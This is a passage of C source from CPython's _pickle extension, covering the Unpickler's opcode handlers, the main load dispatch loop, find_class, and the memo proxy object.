PyObject *obj; /* the object to push */
PyObject *pair; /* (module_name, class_name) */
PyObject *module_name, *class_name;
PickleState *st = _Pickle_GetGlobalState();
assert(nbytes == 1 || nbytes == 2 || nbytes == 4);
if (_Unpickler_Read(self, &codebytes, nbytes) < 0)
return -1;
code = calc_binint(codebytes, nbytes);
if (code <= 0) { /* note that 0 is forbidden */
/* Corrupt or hostile pickle. */
PyErr_SetString(st->UnpicklingError, "EXT specifies code <= 0");
return -1;
}
/* Look for the code in the cache. */
py_code = PyLong_FromLong(code);
if (py_code == NULL)
return -1;
obj = PyDict_GetItemWithError(st->extension_cache, py_code);
if (obj != NULL) {
/* Bingo. */
Py_DECREF(py_code);
PDATA_APPEND(self->stack, obj, -1);
return 0;
}
if (PyErr_Occurred()) {
Py_DECREF(py_code);
return -1;
}
/* Look up the (module_name, class_name) pair. */
pair = PyDict_GetItemWithError(st->inverted_registry, py_code);
if (pair == NULL) {
Py_DECREF(py_code);
if (!PyErr_Occurred()) {
PyErr_Format(PyExc_ValueError, "unregistered extension "
"code %ld", code);
}
return -1;
}
/* Since the extension registry is manipulable via Python code,
* confirm that pair is really a 2-tuple of strings.
*/
if (!PyTuple_Check(pair) || PyTuple_Size(pair) != 2 ||
!PyUnicode_Check(module_name = PyTuple_GET_ITEM(pair, 0)) ||
!PyUnicode_Check(class_name = PyTuple_GET_ITEM(pair, 1))) {
Py_DECREF(py_code);
PyErr_Format(PyExc_ValueError, "_inverted_registry[%ld] "
"isn't a 2-tuple of strings", code);
return -1;
}
/* Load the object. */
obj = find_class(self, module_name, class_name);
if (obj == NULL) {
Py_DECREF(py_code);
return -1;
}
/* Cache code -> obj. */
code = PyDict_SetItem(st->extension_cache, py_code, obj);
Py_DECREF(py_code);
if (code < 0) {
Py_DECREF(obj);
return -1;
}
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
static int
load_put(UnpicklerObject *self)
{
PyObject *key, *value;
Py_ssize_t idx;
Py_ssize_t len;
char *s = NULL;
if ((len = _Unpickler_Readline(self, &s)) < 0)
return -1;
if (len < 2)
return bad_readline();
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
key = PyLong_FromString(s, NULL, 10);
if (key == NULL)
return -1;
idx = PyLong_AsSsize_t(key);
Py_DECREF(key);
if (idx < 0) {
if (!PyErr_Occurred())
PyErr_SetString(PyExc_ValueError,
"negative PUT argument");
return -1;
}
return _Unpickler_MemoPut(self, idx, value);
}
static int
load_binput(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
idx = Py_CHARMASK(s[0]);
return _Unpickler_MemoPut(self, idx, value);
}
static int
load_long_binput(UnpicklerObject *self)
{
PyObject *value;
Py_ssize_t idx;
char *s;
if (_Unpickler_Read(self, &s, 4) < 0)
return -1;
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
idx = calc_binsize(s, 4);
if (idx < 0) {
PyErr_SetString(PyExc_ValueError,
"negative LONG_BINPUT argument");
return -1;
}
return _Unpickler_MemoPut(self, idx, value);
}
static int
load_memoize(UnpicklerObject *self)
{
PyObject *value;
if (Py_SIZE(self->stack) <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
value = self->stack->data[Py_SIZE(self->stack) - 1];
return _Unpickler_MemoPut(self, self->memo_len, value);
}
static int
do_append(UnpicklerObject *self, Py_ssize_t x)
{
PyObject *value;
PyObject *slice;
PyObject *list;
PyObject *result;
Py_ssize_t len, i;
len = Py_SIZE(self->stack);
if (x > len || x <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
if (len == x) /* nothing to do */
return 0;
list = self->stack->data[x - 1];
if (PyList_CheckExact(list)) {
Py_ssize_t list_len;
int ret;
slice = Pdata_poplist(self->stack, x);
if (!slice)
return -1;
list_len = PyList_GET_SIZE(list);
ret = PyList_SetSlice(list, list_len, list_len, slice);
Py_DECREF(slice);
return ret;
}
else {
PyObject *extend_func;
_Py_IDENTIFIER(extend);
extend_func = _PyObject_GetAttrId(list, &PyId_extend);
if (extend_func != NULL) {
slice = Pdata_poplist(self->stack, x);
if (!slice) {
Py_DECREF(extend_func);
return -1;
}
result = _Pickle_FastCall(extend_func, slice);
Py_DECREF(extend_func);
if (result == NULL)
return -1;
Py_DECREF(result);
}
else {
PyObject *append_func;
_Py_IDENTIFIER(append);
/* Even if the PEP 307 requires extend() and append() methods,
fall back on append() if the object has no extend() method
for backward compatibility. */
PyErr_Clear();
append_func = _PyObject_GetAttrId(list, &PyId_append);
if (append_func == NULL)
return -1;
for (i = x; i < len; i++) {
value = self->stack->data[i];
result = _Pickle_FastCall(append_func, value);
if (result == NULL) {
Pdata_clear(self->stack, i + 1);
Py_SIZE(self->stack) = x;
Py_DECREF(append_func);
return -1;
}
Py_DECREF(result);
}
Py_SIZE(self->stack) = x;
Py_DECREF(append_func);
}
}
return 0;
}
static int
load_append(UnpicklerObject *self)
{
if (Py_SIZE(self->stack) - 1 <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
return do_append(self, Py_SIZE(self->stack) - 1);
}
static int
load_appends(UnpicklerObject *self)
{
Py_ssize_t i = marker(self);
if (i < 0)
return -1;
return do_append(self, i);
}
static int
do_setitems(UnpicklerObject *self, Py_ssize_t x)
{
PyObject *value, *key;
PyObject *dict;
Py_ssize_t len, i;
int status = 0;
len = Py_SIZE(self->stack);
if (x > len || x <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
if (len == x) /* nothing to do */
return 0;
if ((len - x) % 2 != 0) {
PickleState *st = _Pickle_GetGlobalState();
        /* Corrupt or hostile pickle -- we never write one like this. */
PyErr_SetString(st->UnpicklingError,
"odd number of items for SETITEMS");
return -1;
}
/* Here, dict does not actually need to be a PyDict; it could be anything
that supports the __setitem__ attribute. */
dict = self->stack->data[x - 1];
for (i = x + 1; i < len; i += 2) {
key = self->stack->data[i - 1];
value = self->stack->data[i];
if (PyObject_SetItem(dict, key, value) < 0) {
status = -1;
break;
}
}
Pdata_clear(self->stack, x);
return status;
}
static int
load_setitem(UnpicklerObject *self)
{
return do_setitems(self, Py_SIZE(self->stack) - 2);
}
static int
load_setitems(UnpicklerObject *self)
{
Py_ssize_t i = marker(self);
if (i < 0)
return -1;
return do_setitems(self, i);
}
static int
load_additems(UnpicklerObject *self)
{
PyObject *set;
Py_ssize_t mark, len, i;
mark = marker(self);
if (mark < 0)
return -1;
len = Py_SIZE(self->stack);
if (mark > len || mark <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
if (len == mark) /* nothing to do */
return 0;
set = self->stack->data[mark - 1];
if (PySet_Check(set)) {
PyObject *items;
int status;
items = Pdata_poptuple(self->stack, mark);
if (items == NULL)
return -1;
status = _PySet_Update(set, items);
Py_DECREF(items);
return status;
}
else {
PyObject *add_func;
_Py_IDENTIFIER(add);
add_func = _PyObject_GetAttrId(set, &PyId_add);
if (add_func == NULL)
return -1;
for (i = mark; i < len; i++) {
PyObject *result;
PyObject *item;
item = self->stack->data[i];
result = _Pickle_FastCall(add_func, item);
if (result == NULL) {
Pdata_clear(self->stack, i + 1);
Py_SIZE(self->stack) = mark;
return -1;
}
Py_DECREF(result);
}
Py_SIZE(self->stack) = mark;
}
return 0;
}
static int
load_build(UnpicklerObject *self)
{
PyObject *state, *inst, *slotstate;
PyObject *setstate;
int status = 0;
_Py_IDENTIFIER(__setstate__);
/* Stack is ... instance, state. We want to leave instance at
* the stack top, possibly mutated via instance.__setstate__(state).
*/
if (Py_SIZE(self->stack) - 2 < self->stack->fence)
return Pdata_stack_underflow(self->stack);
PDATA_POP(self->stack, state);
if (state == NULL)
return -1;
inst = self->stack->data[Py_SIZE(self->stack) - 1];
if (_PyObject_LookupAttrId(inst, &PyId___setstate__, &setstate) < 0) {
Py_DECREF(state);
return -1;
}
if (setstate != NULL) {
PyObject *result;
/* The explicit __setstate__ is responsible for everything. */
result = _Pickle_FastCall(setstate, state);
Py_DECREF(setstate);
if (result == NULL)
return -1;
Py_DECREF(result);
return 0;
}
/* A default __setstate__. First see whether state embeds a
* slot state dict too (a proto 2 addition).
*/
if (PyTuple_Check(state) && PyTuple_GET_SIZE(state) == 2) {
PyObject *tmp = state;
state = PyTuple_GET_ITEM(tmp, 0);
slotstate = PyTuple_GET_ITEM(tmp, 1);
Py_INCREF(state);
Py_INCREF(slotstate);
Py_DECREF(tmp);
}
else
slotstate = NULL;
/* Set inst.__dict__ from the state dict (if any). */
if (state != Py_None) {
PyObject *dict;
PyObject *d_key, *d_value;
Py_ssize_t i;
_Py_IDENTIFIER(__dict__);
if (!PyDict_Check(state)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "state is not a dictionary");
goto error;
}
dict = _PyObject_GetAttrId(inst, &PyId___dict__);
if (dict == NULL)
goto error;
i = 0;
while (PyDict_Next(state, &i, &d_key, &d_value)) {
/* normally the keys for instance attributes are
interned. we should try to do that here. */
Py_INCREF(d_key);
if (PyUnicode_CheckExact(d_key))
PyUnicode_InternInPlace(&d_key);
if (PyObject_SetItem(dict, d_key, d_value) < 0) {
Py_DECREF(d_key);
goto error;
}
Py_DECREF(d_key);
}
Py_DECREF(dict);
}
/* Also set instance attributes from the slotstate dict (if any). */
if (slotstate != NULL) {
PyObject *d_key, *d_value;
Py_ssize_t i;
if (!PyDict_Check(slotstate)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"slot state is not a dictionary");
goto error;
}
i = 0;
while (PyDict_Next(slotstate, &i, &d_key, &d_value)) {
if (PyObject_SetAttr(inst, d_key, d_value) < 0)
goto error;
}
}
if (0) {
error:
status = -1;
}
Py_DECREF(state);
Py_XDECREF(slotstate);
return status;
}
static int
load_mark(UnpicklerObject *self)
{
/* Note that we split the (pickle.py) stack into two stacks, an
* object stack and a mark stack. Here we push a mark onto the
* mark stack.
*/
if (self->num_marks >= self->marks_size) {
size_t alloc = ((size_t)self->num_marks << 1) + 20;
Py_ssize_t *marks_new = self->marks;
PyMem_RESIZE(marks_new, Py_ssize_t, alloc);
if (marks_new == NULL) {
PyErr_NoMemory();
return -1;
}
self->marks = marks_new;
self->marks_size = (Py_ssize_t)alloc;
}
self->stack->mark_set = 1;
self->marks[self->num_marks++] = self->stack->fence = Py_SIZE(self->stack);
return 0;
}
static int
load_reduce(UnpicklerObject *self)
{
PyObject *callable = NULL;
PyObject *argtup = NULL;
PyObject *obj = NULL;
PDATA_POP(self->stack, argtup);
if (argtup == NULL)
return -1;
PDATA_POP(self->stack, callable);
if (callable) {
obj = PyObject_CallObject(callable, argtup);
Py_DECREF(callable);
}
Py_DECREF(argtup);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
/* Just raises an error if we don't know the protocol specified. PROTO
* is the first opcode for protocols >= 2.
*/
static int
load_proto(UnpicklerObject *self)
{
char *s;
int i;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
i = (unsigned char)s[0];
if (i <= HIGHEST_PROTOCOL) {
self->proto = i;
return 0;
}
PyErr_Format(PyExc_ValueError, "unsupported pickle protocol: %d", i);
return -1;
}
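/* FRAME (emitted when framing is enabled, i.e. protocol >= 4 per dump()
 * above): read the 8-byte frame length, pull the whole frame into the
 * buffer in one read, then rewind next_read_idx so the opcodes inside the
 * frame are dispatched normally from the now-buffered data. */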
static int
load_frame(UnpicklerObject *self)
{
char *s;
Py_ssize_t frame_len;
if (_Unpickler_Read(self, &s, 8) < 0)
return -1;
frame_len = calc_binsize(s, 8);
if (frame_len < 0) {
PyErr_Format(PyExc_OverflowError,
"FRAME length exceeds system's maximum of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, frame_len) < 0)
return -1;
/* Rewind to start of frame */
self->next_read_idx -= frame_len;
return 0;
}
static PyObject *
load(UnpicklerObject *self)
{
PyObject *value = NULL;
char *s = NULL;
self->num_marks = 0;
self->stack->mark_set = 0;
self->stack->fence = 0;
self->proto = 0;
if (Py_SIZE(self->stack))
Pdata_clear(self->stack, 0);
/* Convenient macros for the dispatch while-switch loop just below. */
#define OP(opcode, load_func) \
case opcode: if (load_func(self) < 0) break; continue;
#define OP_ARG(opcode, load_func, arg) \
case opcode: if (load_func(self, (arg)) < 0) break; continue;
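/* Each OP/OP_ARG expansion continues the while loop on success; on failure
 * it breaks out of the switch, which falls through to the break after the
 * switch and exits the loop. The PyErr_Occurred() check below distinguishes
 * an error from a normal STOP. */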
while (1) {
if (_Unpickler_Read(self, &s, 1) < 0) {
PickleState *st = _Pickle_GetGlobalState();
if (PyErr_ExceptionMatches(st->UnpicklingError)) {
PyErr_Format(PyExc_EOFError, "Ran out of input");
}
return NULL;
}
switch ((enum opcode)s[0]) {
OP(NONE, load_none)
OP(BININT, load_binint)
OP(BININT1, load_binint1)
OP(BININT2, load_binint2)
OP(INT, load_int)
OP(LONG, load_long)
OP_ARG(LONG1, load_counted_long, 1)
OP_ARG(LONG4, load_counted_long, 4)
OP(FLOAT, load_float)
OP(BINFLOAT, load_binfloat)
OP_ARG(SHORT_BINBYTES, load_counted_binbytes, 1)
OP_ARG(BINBYTES, load_counted_binbytes, 4)
OP_ARG(BINBYTES8, load_counted_binbytes, 8)
OP_ARG(SHORT_BINSTRING, load_counted_binstring, 1)
OP_ARG(BINSTRING, load_counted_binstring, 4)
OP(STRING, load_string)
OP(UNICODE, load_unicode)
OP_ARG(SHORT_BINUNICODE, load_counted_binunicode, 1)
OP_ARG(BINUNICODE, load_counted_binunicode, 4)
OP_ARG(BINUNICODE8, load_counted_binunicode, 8)
OP_ARG(EMPTY_TUPLE, load_counted_tuple, 0)
OP_ARG(TUPLE1, load_counted_tuple, 1)
OP_ARG(TUPLE2, load_counted_tuple, 2)
OP_ARG(TUPLE3, load_counted_tuple, 3)
OP(TUPLE, load_tuple)
OP(EMPTY_LIST, load_empty_list)
OP(LIST, load_list)
OP(EMPTY_DICT, load_empty_dict)
OP(DICT, load_dict)
OP(EMPTY_SET, load_empty_set)
OP(ADDITEMS, load_additems)
OP(FROZENSET, load_frozenset)
OP(OBJ, load_obj)
OP(INST, load_inst)
OP(NEWOBJ, load_newobj)
OP(NEWOBJ_EX, load_newobj_ex)
OP(GLOBAL, load_global)
OP(STACK_GLOBAL, load_stack_global)
OP(APPEND, load_append)
OP(APPENDS, load_appends)
OP(BUILD, load_build)
OP(DUP, load_dup)
OP(BINGET, load_binget)
OP(LONG_BINGET, load_long_binget)
OP(GET, load_get)
OP(MARK, load_mark)
OP(BINPUT, load_binput)
OP(LONG_BINPUT, load_long_binput)
OP(PUT, load_put)
OP(MEMOIZE, load_memoize)
OP(POP, load_pop)
OP(POP_MARK, load_pop_mark)
OP(SETITEM, load_setitem)
OP(SETITEMS, load_setitems)
OP(PERSID, load_persid)
OP(BINPERSID, load_binpersid)
OP(REDUCE, load_reduce)
OP(PROTO, load_proto)
OP(FRAME, load_frame)
OP_ARG(EXT1, load_extension, 1)
OP_ARG(EXT2, load_extension, 2)
OP_ARG(EXT4, load_extension, 4)
OP_ARG(NEWTRUE, load_bool, Py_True)
OP_ARG(NEWFALSE, load_bool, Py_False)
case STOP:
break;
default:
{
PickleState *st = _Pickle_GetGlobalState();
unsigned char c = (unsigned char) *s;
if (0x20 <= c && c <= 0x7e && c != '\'' && c != '\\') {
PyErr_Format(st->UnpicklingError,
"invalid load key, '%c'.", c);
}
else {
PyErr_Format(st->UnpicklingError,
"invalid load key, '\\x%02x'.", c);
}
return NULL;
}
}
break; /* and we are done! */
}
if (PyErr_Occurred()) {
return NULL;
}
if (_Unpickler_SkipConsumed(self) < 0)
return NULL;
PDATA_POP(self->stack, value);
return value;
}
/*[clinic input]
_pickle.Unpickler.load
Load a pickle.
Read a pickled object representation from the open file object given
in the constructor, and return the reconstituted object hierarchy
specified therein.
[clinic start generated code]*/
static PyObject *
_pickle_Unpickler_load_impl(UnpicklerObject *self)
/*[clinic end generated code: output=fdcc488aad675b14 input=acbb91a42fa9b7b9]*/
{
UnpicklerObject *unpickler = (UnpicklerObject*)self;
    /* Check whether the Unpickler was initialized correctly. This prevents
       segfaulting if a subclass overrides __init__ with a function that does
       not call Unpickler.__init__(). Here, we simply ensure that self->read
       is not NULL. */
if (unpickler->read == NULL) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_Format(st->UnpicklingError,
"Unpickler.__init__() was not called by %s.__init__()",
Py_TYPE(unpickler)->tp_name);
return NULL;
}
return load(unpickler);
}
/* The name of find_class() is misleading. In newer pickle protocols, this
function is used for loading any global (i.e., functions), not just
classes. The name is kept only for backward compatibility. */
/*[clinic input]
_pickle.Unpickler.find_class
module_name: object
global_name: object
/
Return an object from a specified module.
If necessary, the module will be imported. Subclasses may override
this method (e.g. to restrict unpickling of arbitrary classes and
functions).
This method is called whenever a class or a function object is
needed. Both arguments passed are str objects.
[clinic start generated code]*/
static PyObject *
_pickle_Unpickler_find_class_impl(UnpicklerObject *self,
PyObject *module_name,
PyObject *global_name)
/*[clinic end generated code: output=becc08d7f9ed41e3 input=e2e6a865de093ef4]*/
{
PyObject *global;
PyObject *module;
/* Try to map the old names used in Python 2.x to the new ones used in
Python 3.x. We do this only with old pickle protocols and when the
user has not disabled the feature. */
if (self->proto < 3 && self->fix_imports) {
PyObject *key;
PyObject *item;
PickleState *st = _Pickle_GetGlobalState();
/* Check if the global (i.e., a function or a class) was renamed
or moved to another module. */
key = PyTuple_Pack(2, module_name, global_name);
if (key == NULL)
return NULL;
item = PyDict_GetItemWithError(st->name_mapping_2to3, key);
Py_DECREF(key);
if (item) {
if (!PyTuple_Check(item) || PyTuple_GET_SIZE(item) != 2) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.NAME_MAPPING values should be "
"2-tuples, not %.200s", Py_TYPE(item)->tp_name);
return NULL;
}
module_name = PyTuple_GET_ITEM(item, 0);
global_name = PyTuple_GET_ITEM(item, 1);
if (!PyUnicode_Check(module_name) ||
!PyUnicode_Check(global_name)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.NAME_MAPPING values should be "
"pairs of str, not (%.200s, %.200s)",
Py_TYPE(module_name)->tp_name,
Py_TYPE(global_name)->tp_name);
return NULL;
}
}
else if (PyErr_Occurred()) {
return NULL;
}
else {
/* Check if the module was renamed. */
item = PyDict_GetItemWithError(st->import_mapping_2to3, module_name);
if (item) {
if (!PyUnicode_Check(item)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.IMPORT_MAPPING values should be "
"strings, not %.200s", Py_TYPE(item)->tp_name);
return NULL;
}
module_name = item;
}
else if (PyErr_Occurred()) {
return NULL;
}
}
}
module = PyImport_GetModule(module_name);
if (module == NULL) {
if (PyErr_Occurred())
return NULL;
module = PyImport_Import(module_name);
if (module == NULL)
return NULL;
}
global = getattribute(module, global_name, self->proto >= 4);
Py_DECREF(module);
return global;
}
/*[clinic input]
_pickle.Unpickler.__sizeof__ -> Py_ssize_t
Returns size in memory, in bytes.
[clinic start generated code]*/
static Py_ssize_t
_pickle_Unpickler___sizeof___impl(UnpicklerObject *self)
/*[clinic end generated code: output=119d9d03ad4c7651 input=13333471fdeedf5e]*/
{
Py_ssize_t res;
res = _PyObject_SIZE(Py_TYPE(self));
if (self->memo != NULL)
res += self->memo_size * sizeof(PyObject *);
if (self->marks != NULL)
res += self->marks_size * sizeof(Py_ssize_t);
if (self->input_line != NULL)
res += strlen(self->input_line) + 1;
if (self->encoding != NULL)
res += strlen(self->encoding) + 1;
if (self->errors != NULL)
res += strlen(self->errors) + 1;
return res;
}
static struct PyMethodDef Unpickler_methods[] = {
_PICKLE_UNPICKLER_LOAD_METHODDEF
_PICKLE_UNPICKLER_FIND_CLASS_METHODDEF
_PICKLE_UNPICKLER___SIZEOF___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
Unpickler_dealloc(UnpicklerObject *self)
{
PyObject_GC_UnTrack((PyObject *)self);
Py_XDECREF(self->readline);
Py_XDECREF(self->read);
Py_XDECREF(self->peek);
Py_XDECREF(self->stack);
Py_XDECREF(self->pers_func);
if (self->buffer.buf != NULL) {
PyBuffer_Release(&self->buffer);
self->buffer.buf = NULL;
}
_Unpickler_MemoCleanup(self);
PyMem_Free(self->marks);
PyMem_Free(self->input_line);
PyMem_Free(self->encoding);
PyMem_Free(self->errors);
Py_TYPE(self)->tp_free((PyObject *)self);
}
static int
Unpickler_traverse(UnpicklerObject *self, visitproc visit, void *arg)
{
Py_VISIT(self->readline);
Py_VISIT(self->read);
Py_VISIT(self->peek);
Py_VISIT(self->stack);
Py_VISIT(self->pers_func);
return 0;
}
static int
Unpickler_clear(UnpicklerObject *self)
{
Py_CLEAR(self->readline);
Py_CLEAR(self->read);
Py_CLEAR(self->peek);
Py_CLEAR(self->stack);
Py_CLEAR(self->pers_func);
if (self->buffer.buf != NULL) {
PyBuffer_Release(&self->buffer);
self->buffer.buf = NULL;
}
_Unpickler_MemoCleanup(self);
PyMem_Free(self->marks);
self->marks = NULL;
PyMem_Free(self->input_line);
self->input_line = NULL;
PyMem_Free(self->encoding);
self->encoding = NULL;
PyMem_Free(self->errors);
self->errors = NULL;
return 0;
}
/*[clinic input]
_pickle.Unpickler.__init__
file: object
*
fix_imports: bool = True
encoding: str = 'ASCII'
errors: str = 'strict'
This takes a binary file for reading a pickle data stream.
The protocol version of the pickle is detected automatically, so no
protocol argument is needed. Bytes past the pickled object's
representation are ignored.
The argument *file* must have two methods, a read() method that takes
an integer argument, and a readline() method that requires no
arguments. Both methods should return bytes. Thus *file* can be a
binary file object opened for reading, an io.BytesIO object, or any
other custom object that meets this interface.
Optional keyword arguments are *fix_imports*, *encoding* and *errors*,
which are used to control compatibility support for pickle streams
generated by Python 2. If *fix_imports* is True, pickle will try to
map the old Python 2 names to the new names used in Python 3. The
*encoding* and *errors* tell pickle how to decode 8-bit string
instances pickled by Python 2; these default to 'ASCII' and 'strict',
respectively. The *encoding* can be 'bytes' to read these 8-bit
string instances as bytes objects.
[clinic start generated code]*/
static int
_pickle_Unpickler___init___impl(UnpicklerObject *self, PyObject *file,
int fix_imports, const char *encoding,
const char *errors)
/*[clinic end generated code: output=e2c8ce748edc57b0 input=f9b7da04f5f4f335]*/
{
_Py_IDENTIFIER(persistent_load);
/* In case of multiple __init__() calls, clear previous content. */
if (self->read != NULL)
(void)Unpickler_clear(self);
if (_Unpickler_SetInputStream(self, file) < 0)
return -1;
if (_Unpickler_SetInputEncoding(self, encoding, errors) < 0)
return -1;
self->fix_imports = fix_imports;
if (init_method_ref((PyObject *)self, &PyId_persistent_load,
&self->pers_func, &self->pers_func_self) < 0)
{
return -1;
}
self->stack = (Pdata *)Pdata_New();
if (self->stack == NULL)
        return -1;
self->memo_size = 32;
self->memo = _Unpickler_NewMemo(self->memo_size);
if (self->memo == NULL)
return -1;
self->proto = 0;
return 0;
}
/* Define a proxy object for the Unpickler's internal memo object. This is to
* avoid breaking code like:
* unpickler.memo.clear()
* and
* unpickler.memo = saved_memo
* Is this a good idea? Not really, but we don't want to break code that uses
* it. Note that we don't implement the entire mapping API here. This is
* intentional, as these should be treated as black-box implementation details.
*
* We do, however, have to implement pickling/unpickling support because of
* real-world code like cvs2svn.
*/
/*[clinic input]
_pickle.UnpicklerMemoProxy.clear
Remove all items from memo.
[clinic start generated code]*/
static PyObject *
_pickle_UnpicklerMemoProxy_clear_impl(UnpicklerMemoProxyObject *self)
/*[clinic end generated code: output=d20cd43f4ba1fb1f input=b1df7c52e7afd9bd]*/
{
_Unpickler_MemoCleanup(self->unpickler);
self->unpickler->memo = _Unpickler_NewMemo(self->unpickler->memo_size);
if (self->unpickler->memo == NULL)
return NULL;
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.UnpicklerMemoProxy.copy
Copy the memo to a new object.
[clinic start generated code]*/
static PyObject *
_pickle_UnpicklerMemoProxy_copy_impl(UnpicklerMemoProxyObject *self)
/*[clinic end generated code: output=e12af7e9bc1e4c77 input=97769247ce032c1d]*/
{
Py_ssize_t i;
PyObject *new_memo = PyDict_New();
if (new_memo == NULL)
return NULL;
for (i = 0; i < self->unpickler->memo_size; i++) {
int status;
PyObject *key, *value;
value = self->unpickler->memo[i];
if (value == NULL)
continue;
key = PyLong_FromSsize_t(i);
if (key == NULL)
goto error;
status = PyDict_SetItem(new_memo, key, value);
Py_DECREF(key);
if (status < 0)
goto error;
}
return new_memo;
error:
Py_DECREF(new_memo);
return NULL;
}
/*[clinic input]
_pickle.UnpicklerMemoProxy.__reduce__
Implement pickling support.
[clinic start generated code]*/
static PyObject *
_pickle_UnpicklerMemoProxy___reduce___impl(UnpicklerMemoProxyObject *self)
/*[clinic end generated code: output=6da34ac048d94cca input=6920862413407199]*/
{
PyObject *reduce_value;
PyObject *constructor_args;
PyObject *contents = _pickle_UnpicklerMemoProxy_copy_impl(self);
if (contents == NULL)
return NULL;
reduce_value = PyTuple_New(2);
if (reduce_value == NULL) {
Py_DECREF(contents);
return NULL;
}
constructor_args = PyTuple_New(1);
if (constructor_args == NULL) {
Py_DECREF(contents);
Py_DECREF(reduce_value);
return NULL;
}
PyTuple_SET_ITEM(constructor_args, 0, contents);
Py_INCREF((PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 0, (PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 1, constructor_args);
return reduce_value;
}
static PyMethodDef unpicklerproxy_methods[] = {
_PICKLE_UNPICKLERMEMOPROXY_CLEAR_METHODDEF
_PICKLE_UNPICKLERMEMOPROXY_COPY_METHODDEF
_PICKLE_UNPICKLERMEMOPROXY___REDUCE___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
UnpicklerMemoProxy_dealloc(UnpicklerMemoProxyObject *self)
{
PyObject_GC_UnTrack(self);
Py_XDECREF(self->unpickler);
PyObject_GC_Del((PyObject *)self);
}
static int
UnpicklerMemoProxy_traverse(UnpicklerMemoProxyObject *self,
visitproc visit, void *arg)
{
Py_VISIT(self->unpickler);
return 0;
}
static int
UnpicklerMemoProxy_clear(UnpicklerMemoProxyObject *self)
{
Py_CLEAR(self->unpickler);
return 0;
}
static PyTypeObject UnpicklerMemoProxyType = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.UnpicklerMemoProxy", /*tp_name*/
sizeof(UnpicklerMemoProxyObject), /*tp_basicsize*/
0,
(destructor)UnpicklerMemoProxy_dealloc, /* tp_dealloc */
0, /* tp_print */
0, /* tp_getattr */
0, /* tp_setattr */
0, /* tp_compare */
0, /* tp_repr */
0, /* tp_as_number */
0, /* tp_as_sequence */
0, /* tp_as_mapping */
PyObject_HashNotImplemented, /* tp_hash */
0, /* tp_call */
0, /* tp_str */
PyObject_GenericGetAttr, /* tp_getattro */
PyObject_GenericSetAttr, /* tp_setattro */
0, /* tp_as_buffer */
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
0, /* tp_doc */
(traverseproc)UnpicklerMemoProxy_traverse, /* tp_traverse */
(inquiry)UnpicklerMemoProxy_clear, /* tp_clear */
0, /* tp_richcompare */
0, /* tp_weaklistoffset */
0, /* tp_iter */
0, /* tp_iternext */
unpicklerproxy_methods, /* tp_methods */
};
static PyObject *
UnpicklerMemoProxy_New(UnpicklerObject *unpickler)
{
UnpicklerMemoProxyObject *self;
self = PyObject_GC_New(UnpicklerMemoProxyObject,
&UnpicklerMemoProxyType);
if (self == NULL)
return NULL;
Py_INCREF(unpickler);
self->unpickler = unpickler;
PyObject_GC_Track(self);
return (PyObject *)self;
}
/*****************************************************************************/
static PyObject *
Unpickler_get_memo(UnpicklerObject *self)
{
return UnpicklerMemoProxy_New(self);
}
static int
Unpickler_set_memo(UnpicklerObject *self, PyObject *obj)
{
PyObject **new_memo;
Py_ssize_t new_memo_size = 0;
Py_ssize_t i;
if (obj == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (Py_TYPE(obj) == &UnpicklerMemoProxyType) {
UnpicklerObject *unpickler =
((UnpicklerMemoProxyObject *)obj)->unpickler;
new_memo_size = unpickler->memo_size;
new_memo = _Unpickler_NewMemo(new_memo_size);
if (new_memo == NULL)
return -1;
for (i = 0; i < new_memo_size; i++) {
Py_XINCREF(unpickler->memo[i]);
new_memo[i] = unpickler->memo[i];
}
}
else if (PyDict_Check(obj)) {
Py_ssize_t i = 0;
PyObject *key, *value;
new_memo_size = PyDict_GET_SIZE(obj);
new_memo = _Unpickler_NewMemo(new_memo_size);
if (new_memo == NULL)
return -1;
while (PyDict_Next(obj, &i, &key, &value)) {
Py_ssize_t idx;
if (!PyLong_Check(key)) {
PyErr_SetString(PyExc_TypeError,
"memo key must be integers");
goto error;
}
idx = PyLong_AsSsize_t(key);
if (idx == -1 && PyErr_Occurred())
goto error;
if (idx < 0) {
PyErr_SetString(PyExc_ValueError,
"memo key must be positive integers.");
goto error;
}
if (_Unpickler_MemoPut(self, idx, value) < 0)
goto error;
}
}
else {
PyErr_Format(PyExc_TypeError,
"'memo' attribute must be an UnpicklerMemoProxy object"
"or dict, not %.200s", Py_TYPE(obj)->tp_name);
return -1;
}
_Unpickler_MemoCleanup(self);
self->memo_size = new_memo_size;
self->memo = new_memo;
return 0;
error:
if (new_memo_size) {
i = new_memo_size;
while (--i >= 0) {
Py_XDECREF(new_memo[i]);
}
PyMem_FREE(new_memo);
}
return -1;
}
static PyObject *
